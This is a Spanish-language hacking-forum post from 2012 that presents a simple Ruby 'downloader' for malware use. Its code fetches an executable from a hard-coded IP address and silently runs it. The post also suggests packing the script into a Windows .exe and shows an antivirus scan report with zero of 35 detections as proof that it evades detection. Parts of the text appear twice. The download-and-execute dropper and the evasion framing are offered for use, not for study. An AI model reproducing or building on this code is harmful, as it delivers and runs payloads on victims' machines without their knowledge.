Mar Oct 16, 2012 5:21 pm
Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.
Código :
Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :
[Tienes que estar registrado y conectado para ver este vínculo]
Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :
[Info]
Fecha del reporte: Wed, 12 Sep 2012 22:49:23 +0000
Archivo: downloader.exe
Tamaño: 5099284 bytes
MD5: 49e985612dcf90085bb9a61093abddc8
Estado: Limpio
Detecciones: 0 de 35 (0%)
Reporte: [Tienes que estar registrado y conectado para ver este vínculo]
Reporte generado por [Tienes que estar registrado y conectado para ver este vínculo]
[Detecciones]
A-Squared - Clean
AVG Free - Clean
Ad-Aware - Clean
AntiVir (Avira) - Clean
ArcaVir - Clean
Avast 5 - Clean
BitDefender - Clean
BullGuard - Clean
COMODO Internet Security - Clean
Clam Antivirus - Clean
Dr.Web - Clean
ESET NOD32 - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Antivirus - Clean
MS Security Essentials - Clean
McAfee - Clean
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Clean
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
VIPRE - Clean
Vexira Antivirus - Clean
VirusBuster Internet Security - Clean
Zoner AntiVirus - Clean
eTrust-Vet - Clean
Gracias Elsuc por escanearme el archivo.
Y aqui una muestra de como se comporta :
Código :
- Código:
require 'Win32API'
require 'open-uri'
=begin
----------------------------------
| Coded by Sanko |
| Simple Ruby Downloader |
----------------------------------
=end
archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar
archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close
aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
system 'sk.exe'
end
Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :
[Tienes que estar registrado y conectado para ver este vínculo]
Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :
[Info]
Fecha del reporte: Wed, 12 Sep 2012 22:49:23 +0000
Archivo: downloader.exe
Tamaño: 5099284 bytes
MD5: 49e985612dcf90085bb9a61093abddc8
Estado: Limpio
Detecciones: 0 de 35 (0%)
Reporte: [Tienes que estar registrado y conectado para ver este vínculo]
Reporte generado por [Tienes que estar registrado y conectado para ver este vínculo]
[Detecciones]
A-Squared - Clean
AVG Free - Clean
Ad-Aware - Clean
AntiVir (Avira) - Clean
ArcaVir - Clean
Avast 5 - Clean
BitDefender - Clean
BullGuard - Clean
COMODO Internet Security - Clean
Clam Antivirus - Clean
Dr.Web - Clean
ESET NOD32 - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Antivirus - Clean
MS Security Essentials - Clean
McAfee - Clean
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Clean
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
VIPRE - Clean
Vexira Antivirus - Clean
VirusBuster Internet Security - Clean
Zoner AntiVirus - Clean
eTrust-Vet - Clean
Gracias Elsuc por escanearme el archivo.
Y aqui una muestra de como se comporta :